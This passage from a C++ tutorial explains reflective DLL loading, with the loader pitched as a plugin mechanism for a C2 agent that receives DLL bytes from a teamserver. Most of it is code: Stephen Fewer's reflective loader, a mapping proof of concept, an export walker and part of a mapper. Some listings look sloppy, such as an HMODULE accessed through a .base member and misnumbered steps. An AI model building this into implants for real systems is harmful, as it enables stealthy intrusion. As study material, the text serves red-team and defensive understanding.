Using Reflective Loaders to Replace LoadLibrary for Hot Swappable Modules in C++
Disclaimer
The material in this article is provided for educational purposes only. Mapping PE images from memory, implementing reflective loaders, and building plugin-style interfaces can be powerful techniques that must only be used on systems you own or have explicit written permission to test.
By using any ideas or code patterns described here, you accept full responsibility for complying with all applicable laws, contracts, and policies. The author and publisher do not endorse or condone illegal activity and assume no liability for misuse, loss, or damages.
To practice safely:
Work in an isolated lab (offline VMs, snapshots, disposable accounts).
Keep tests scoped, logged, and authorized.
Prefer well-documented, maintainable implementations over “clever” evasion.
Treat examples as starting points, not turnkey tools; review for correctness, security, and ethics before use.
Summary
I’m going to show a practical way to map a PE DLL straight from memory and call its exported interface functions like hot-swappable plugins. The focus here is on being clear and repeatable: a stable plugin ABI, a predictable mapper, and a test flow you can run on a Friday night without cursing at your screen. To keep this article readable, longer listings stay as code blocks you can drop into your project when you’re ready for testing.
Table of Contents
Background
The Idea
The Journey
What is Reflective DLL Loading?
Where to start?
Reimplement the Technique
A Custom GetProcAddress
Mapper
Plugin ABI
Interface & exports
Example Module: Command Execution
Host Test Harness
Checklist for the harness:
Extensions
Going Forward
Conclusions
References
Background
I fell down this rabbit hole after a few chats about modular “hot plugin” designs (shoutout to @Jonathan Wallace’s TactixC2 threads), plus a lot of tinkering with Windows PE internals and community loaders. The endgame: ship a tiny, in-process mapper; fetch the right DLL when you need it; and call into a clean interface—rather than jumping blindly to a single entry point and hoping for the best.
This style keeps the resident footprint small and avoids spinning up helper processes for every action. In practice: the agent maps a DLL from bytes, resolves a handful of exports, constructs a plugin object, and runs execute(task) with a simple payload.
The Idea
Here’s the flow I aim for:
The teamserver sends an instruction plus the matching plugin DLL bytes.
The agent maps that DLL from memory (custom mapper).
The agent locates exports (factory, init, exec, cleanup).
The agent constructs an
IPluginand callsinit → execute(task) → cleanup.Output goes wherever you’ve decided (console, buffers, whatever fits your world).
One important note: you’re replacing the loader’s mapping steps for this in-memory image. You can still lean on OS APIs to satisfy that image’s imports. Think “a custom mapper for this module,” not “banish LoadLibrary forever.”
The Journey
What is Reflective DLL Loading?
It’s basically the OS loader, but by hand: parse headers, copy sections, apply relocations, resolve imports, set protections, maybe run the DLLEntry—and do it all from a byte buffer you already have. Same puzzle, different pieces.
Where to start?
First, let's look at Stephen Fewer's implementation from more than a decade ago. First, process exports for the functions the loader needs:
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef WIN_X64
uiBaseAddress = __readgsqword(0x60);
#else
#ifdef WIN_X86
uiBaseAddress = __readfsdword(0x30);
#else WIN_ARM
uiBaseAddress = *(DWORD*)((BYTE*)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
#endif
#endif
ULONG_PTR kernel32BaseAddress = (ULONG_PTR)NULL;
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while (uiValueA)
{
// get pointer to current modules name (unicode string)
uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror((DWORD)uiValueC);
// normalize to uppercase if the module name is in lowercase
if (*((BYTE*)uiValueB) >= 'a')
uiValueC += *((BYTE*)uiValueB) - 0x20;
else
uiValueC += *((BYTE*)uiValueB);
uiValueB++;
} while (--usCounter);
// compare the hash with that of kernel32.dll
if ((DWORD)uiValueC == KERNEL32DLL_HASH)
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
kernel32BaseAddress = uiBaseAddress;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// get the VA of the export directory
uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
// get the VA for the array of name pointers
uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
// get the VA for the array of name ordinals
uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
// Number of imports to resolve
usCounter = 4;
// loop while we still have imports to find
while (usCounter > 0)
{
// compute the hash values for this function name
dwHashValue = hash((char*)(uiBaseAddress + DEREF_32(uiNameArray)));
// if we have found a function we want we get its virtual address
if (dwHashValue == LOADLIBRARYA_HASH
|| dwHashValue == GETPROCADDRESS_HASH
|| dwHashValue == VIRTUALALLOC_HASH
|| dwHashValue == VIRTUALPROTECT_HASH
)
{
// get the VA for the array of addresses
uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
// store this functions VA
if (dwHashValue == LOADLIBRARYA_HASH)
pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray));
else if (dwHashValue == GETPROCADDRESS_HASH)
pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray));
else if (dwHashValue == VIRTUALALLOC_HASH)
pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray));
else if (dwHashValue == VIRTUALPROTECT_HASH)
pVirtualProtect = (VIRTUALPROTECT)(uiBaseAddress + DEREF_32(uiAddressArray));
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
else if ((DWORD)uiValueC == NTDLLDLL_HASH)
{
// get this modules base address
uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// get the VA of the export directory
uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
// get the VA for the array of name pointers
uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
// get the VA for the array of name ordinals
uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
usCounter = 1;
// loop while we still have imports to find
while (usCounter > 0)
{
// compute the hash values for this function name
dwHashValue = hash((char*)(uiBaseAddress + DEREF_32(uiNameArray)));
// if we have found a function we want we get its virtual address
if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
{
// get the VA for the array of addresses
uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
// store this functions VA
if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray));
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
// we stop searching when we have found everything we need.
if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache && pVirtualProtect)
break;
// get the next entry
uiValueA = DEREF(uiValueA);
}
```
Next, reserve and commit memory, copy headers, and prepare to fix up the image.
```c
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
while (uiValueA--)
*(BYTE*)uiValueC++ = *(BYTE*)uiValueB++;
// Set headers protection to Read only.
PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)uiHeaderValue;Load each section at its VirtualAddress and copy its raw bytes.
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
// itterate through all sections, loading them into memory.
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while (uiValueE--)
{
// uiValueB is the VA for this section
uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
// uiValueC if the VA for this sections data
uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData);
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
while (uiValueD--)
*(BYTE*)uiValueB++ = *(BYTE*)uiValueC++;
// get the VA of the next section
uiValueA += sizeof(IMAGE_SECTION_HEADER);
}Walk the import table and write resolved addresses into the IAT.
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
// itterate through all imports
while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
// uiValueD = VA of the OriginalFirstThunk
uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk);
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk);
// itterate through all imported functions, importing by ordinal if no name present
while (DEREF(uiValueA))
{
// sanity check uiValueD as some compilers only import by FirstThunk
if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG)
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// get the VA of the export directory
uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
// get the VA for the array of addresses
uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD));
// patch in the address for this imported function
DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray));
}
else
{
// get the VA of this functions import by name struct
uiValueB = (uiBaseAddress + DEREF(uiValueA));
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
}
// get the next imported function
uiValueA += sizeof(ULONG_PTR);
if (uiValueD)
uiValueD += sizeof(ULONG_PTR);
}
// get the next import
uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
}Apply relocations appropriate to the target architecture.
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
// check if their are any relocations present
if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size)
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
// and we itterate through all entries...
while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock)
{
// uiValueA = the VA for this relocation block
uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress);
// uiValueB = number of entries in this relocation block
uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while (uiValueB--)
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64)
*(ULONG_PTR*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW)
*(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
#ifdef WIN_ARM
// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T)
{
register DWORD dwInstruction;
register DWORD dwAddress;
register WORD wImm;
// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
dwInstruction = *(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD));
// flip the words to get the instruction as expected
dwInstruction = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
// sanity chack we are processing a MOV instruction...
if ((dwInstruction & ARM_MOV_MASK) == ARM_MOVT)
{
// pull out the encoded 16bit value (the high portion of the address-to-relocate)
wImm = (WORD)(dwInstruction & 0x000000FF);
wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
// apply the relocation to the target address
dwAddress = ((WORD)HIWORD(uiLibraryAddress) + wImm) & 0xFFFF;
// now create a new instruction with the same opcode and register param.
dwInstruction = (DWORD)(dwInstruction & ARM_MOV_MASK2);
// patch in the relocated address...
dwInstruction |= (DWORD)(dwAddress & 0x00FF);
dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
// now flip the instructions words and patch back into the code...
*(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)) = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
}
}
#endif
else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH)
*(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW)
*(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof(IMAGE_RELOC);
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}Set final protections for headers and sections to mirror the PE’s intent.
//
// Step 6: Adjust section permissions
//
// uiValueA = the VA of the first section
uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while (uiValueE--)
{
// uiValueB is the VA for this section
uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
pVirtualProtect(
(LPVOID)uiValueB,
((PIMAGE_SECTION_HEADER)uiValueA)->Misc.VirtualSize,
translate_protect(((PIMAGE_SECTION_HEADER)uiValueA)->Characteristics),
&oldProt
);
// get the VA of the next section
uiValueA += sizeof(IMAGE_SECTION_HEADER);
}Optionally flush the instruction cache and, if this module depends on loader-driven init, invoke the entry point.
// STEP 9: call our images entry point
// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter);
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
#endifReimplement the Technique
My first sanity check was a small “map and call” PoC I found in ired.team—just enough to see each step work in isolation. The big insight: once the image lives in memory, you can walk its exports yourself and call them directly.
#include "pch.h"
#include <iostream>
#include <Windows.h>
typedef struct BASE_RELOCATION_BLOCK {
DWORD PageAddress;
DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
typedef struct BASE_RELOCATION_ENTRY {
USHORT Offset : 12;
USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
using DLLEntry = BOOL(WINAPI *)(HINSTANCE dll, DWORD reason, LPVOID reserved);
int main()
{
// get this module's image base address
PVOID imageBase = GetModuleHandleA(NULL);
// load DLL into memory
HANDLE dll = CreateFileA("\\\\VBOXSVR\\Experiments\\MLLoader\\MLLoader\\x64\\Debug\\dll.dll", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
DWORD64 dllSize = GetFileSize(dll, NULL);
LPVOID dllBytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllSize);
DWORD outSize = 0;
ReadFile(dll, dllBytes, dllSize, &outSize, NULL);
// get pointers to in-memory DLL headers
PIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBytes;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBytes + dosHeaders->e_lfanew);
SIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;
// allocate new memory space for the DLL. Try to allocate memory in the image's preferred base address, but don't stress if the memory is allocated elsewhere
//LPVOID dllBase = VirtualAlloc((LPVOID)0x000000191000000, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
LPVOID dllBase = VirtualAlloc((LPVOID)ntHeaders->OptionalHeader.ImageBase, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// get delta between this module's image base and the DLL that was read into memory
DWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)ntHeaders->OptionalHeader.ImageBase;
// copy over DLL image headers to the newly allocated space for the DLL
std::memcpy(dllBase, dllBytes, ntHeaders->OptionalHeader.SizeOfHeaders);
// copy over DLL image sections to the newly allocated space for the DLL
PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHeaders);
for (size_t i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
{
LPVOID sectionDestination = (LPVOID)((DWORD_PTR)dllBase + (DWORD_PTR)section->VirtualAddress);
LPVOID sectionBytes = (LPVOID)((DWORD_PTR)dllBytes + (DWORD_PTR)section->PointerToRawData);
std::memcpy(sectionDestination, sectionBytes, section->SizeOfRawData);
section++;
}
// perform image base relocations
IMAGE_DATA_DIRECTORY relocations = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
DWORD_PTR relocationTable = relocations.VirtualAddress + (DWORD_PTR)dllBase;
DWORD relocationsProcessed = 0;
while (relocationsProcessed < relocations.Size)
{
PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)(relocationTable + relocationsProcessed);
relocationsProcessed += sizeof(BASE_RELOCATION_BLOCK);
DWORD relocationsCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)(relocationTable + relocationsProcessed);
for (DWORD i = 0; i < relocationsCount; i++)
{
relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
if (relocationEntries[i].Type == 0)
{
continue;
}
DWORD_PTR relocationRVA = relocationBlock->PageAddress + relocationEntries[i].Offset;
DWORD_PTR addressToPatch = 0;
ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
addressToPatch += deltaImageBase;
std::memcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
}
}
// resolve import address table
PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
importDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress + (DWORD_PTR)dllBase);
LPCSTR libraryName = "";
HMODULE library = NULL;
while (importDescriptor->Name != NULL)
{
libraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)dllBase;
library = LoadLibraryA(libraryName);
if (library)
{
PIMAGE_THUNK_DATA thunk = NULL;
thunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)dllBase + importDescriptor->FirstThunk);
while (thunk->u1.AddressOfData != NULL)
{
if (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))
{
LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);
thunk->u1.Function = (DWORD_PTR)GetProcAddress(library, functionOrdinal);
}
else
{
PIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)dllBase + thunk->u1.AddressOfData);
DWORD_PTR functionAddress = (DWORD_PTR)GetProcAddress(library, functionName->Name);
thunk->u1.Function = functionAddress;
}
++thunk;
}
}
importDescriptor++;
}
// execute the loaded DLL
DLLEntry DllEntry = (DLLEntry)((DWORD_PTR)dllBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);
(*DllEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);
CloseHandle(dll);
HeapFree(GetProcessHeap(), 0, dllBytes);
return 0;
}A Custom GetProcAddress
Since the OS loader didn’t register your mapped image like a normal module, you’ll want a tiny export walker over your base: read IMAGE_EXPORT_DIRECTORY, find the name, convert RVA → VA, return the pointer. Nothing fancy—just reliable.
void* GetExport(const HMODULE& mod, const char* name) {
if (!mod.base) return nullptr;
auto base = (uint8_t*)mod.base;
auto dos = (PIMAGE_DOS_HEADER)base;
auto nt = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
auto& dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return nullptr;
auto ed = (PIMAGE_EXPORT_DIRECTORY)(base + dir.VirtualAddress);
auto names = (DWORD*)(base + ed->AddressOfNames);
auto ords = (WORD*)(base + ed->AddressOfNameOrdinals);
auto funs = (DWORD*)(base + ed->AddressOfFunctions);
for (DWORD i = 0; i < ed->NumberOfNames; ++i) {
const char* nm = (const char*)(base + names[i]);
if (_stricmp(nm, name) == 0) {
WORD ord = ords[i];
DWORD rva = funs[ord];
return (void*)(base + rva);
}
}
return nullptr;
}Mapper
A neat mapper returns the mapped base (your stand-in for HMODULE). It should:
Validate DOS/NT headers
Allocate
SizeOfImageCopy headers + sections
Apply relocations
Resolve imports
Set final protections
Optionally flush the instruction cache
HMODULE MapImage(const uint8_t* dll, size_t dllSize) {
HMODULE out{};
if (!dll || dllSize < sizeof(IMAGE_DOS_HEADER)) return out;
// Copy raw into temp buffer
void* raw = VirtualAlloc(nullptr, dllSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!raw) return out;
std::memcpy(raw, dll, dllSize);
auto dos = (PIMAGE_DOS_HEADER)raw;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) { VirtualFree(raw, 0, MEM_RELEASE); return out; }
auto nt = (PIMAGE_NT_HEADERS)((uint8_t*)raw + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) { VirtualFree(raw, 0, MEM_RELEASE); return out; }
SIZE_T imageSize = nt->OptionalHeader.SizeOfImage;
uint8_t* base = (uint8_t*)VirtualAlloc((LPVOID)nt->OptionalHeader.ImageBase, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!base) base = (uint8_t*)VirtualAlloc(nullptr, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!base) { VirtualFree(raw, 0, MEM_RELEASE); return out; }
// Copy headers
std::memcpy(base, raw, nt->OptionalHeader.SizeOfHeaders);
// Copy sections
auto sec = IMAGE_FIRST_SECTION(nt);
for (int i = 0; i < nt->FileHeader.NumberOfSections; ++i, ++sec) {
if (sec->SizeOfRawData == 0) continue;
std::memcpy(base + sec->VirtualAddress,
(uint8_t*)raw + sec->PointerToRawData,
sec->SizeOfRawData);
}
// Relocations
DWORD_PTR delta = (DWORD_PTR)base - nt->OptionalHeader.ImageBase;
if (delta && nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size) {
auto reloc = (PIMAGE_BASE_RELOCATION)(base + nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
auto end = (uint8_t*)reloc + nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
while ((uint8_t*)reloc < end && reloc->SizeOfBlock) {
size_t count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
auto list = (WORD*)(reloc + 1);
for (size_t i = 0; i < count; ++i) {
WORD typeOff = list[i];
WORD type = typeOff >> 12;
WORD off = typeOff & 0x0FFF;
#ifdef _WIN64
if (type == IMAGE_REL_BASED_DIR64) {
auto* p = (ULONG_PTR*)(base + reloc->VirtualAddress + off);
*p += delta;
}
#else
if (type == IMAGE_REL_BASED_HIGHLOW) {
auto* p = (ULONG_PTR*)(base + reloc->VirtualAddress + off);
*p += delta;
}
#endif
}
reloc = (PIMAGE_BASE_RELOCATION)((uint8_t*)reloc + reloc->SizeOfBlock);
}
}
// Imports
if (nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) {
auto imp = (PIMAGE_IMPORT_DESCRIPTOR)(base + nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
for (; imp->Name; ++imp) {
const char* lib = (const char*)(base + imp->Name);
HMODULE m = LoadLibraryA(lib);
if (!m) continue;
auto thunk = (PIMAGE_THUNK_DATA)(base + imp->FirstThunk);
auto origThunk = (PIMAGE_THUNK_DATA)(base + imp->OriginalFirstThunk);
for (; thunk->u1.AddressOfData; ++thunk, ++origThunk) {
FARPROC addr = nullptr;
if (origThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) {
addr = GetProcAddress(m, (LPCSTR)(origThunk->u1.Ordinal & 0xFFFF));
}
else {
auto ibn = (PIMAGE_IMPORT_BY_NAME)(base + origThunk->u1.AddressOfData);
addr = GetProcAddress(m, (LPCSTR)ibn->Name);
}
#ifdef _WIN64
